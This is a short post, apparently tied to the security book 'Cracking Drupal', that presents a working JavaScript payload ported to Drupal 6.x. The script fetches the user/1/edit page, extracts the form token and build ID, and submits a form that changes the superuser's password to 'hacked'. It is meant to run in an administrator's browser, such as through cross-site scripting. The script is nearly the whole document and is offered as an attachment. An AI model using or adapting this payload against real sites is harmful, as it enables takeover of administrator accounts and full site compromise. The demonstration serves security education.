Update UID1 Password Via Javascript - Ported to Drupal 6.x
Heine Deelstra created a script to update UID 1 password via JavaScript. This script needed some updating to work with Drupal 6.x and since my book - Cracking Drupal is primarily about Drupal 6.x I updated the script. You will find the script attached and presented below:
// Test for the presence of jquery. if (typeof jQuery == 'function') { // Fetch a correct token from user/1/edit because we will need it to // successfully submit the user edit form later. // TODO: Include a check to increase the chance that the current user is admin, // which will reduce the number of access denied error messages in the log. jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/id="edit-name" size="[0-9]*" value="([a-z0-9]*)"/); var name = matches[1]; var matches = data.match(/id="edit-mail" size="[0-9]*" value="([a-z0-9]*@[a-z0-9]*.[a-z0-9]*)"/); var mail = matches[1]; var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]*)"/); var token = matches[1]; var matches = data.match(/name="form_build_id" id="(form-[a-z0-9]*)" value="(form-[a-z0-9]*)"/); var build_id = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "name": name, "mail": mail, "form_id": 'user_profile_form', "form_token": token, build_id : build_id, "pass[pass1]": 'hacked', "pass[pass2]": 'hacked' }; jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload); } } ); }
Attachment | Size |
---|---|
uid1_changer.js.txt | 1.39 KB |
- Login to post comments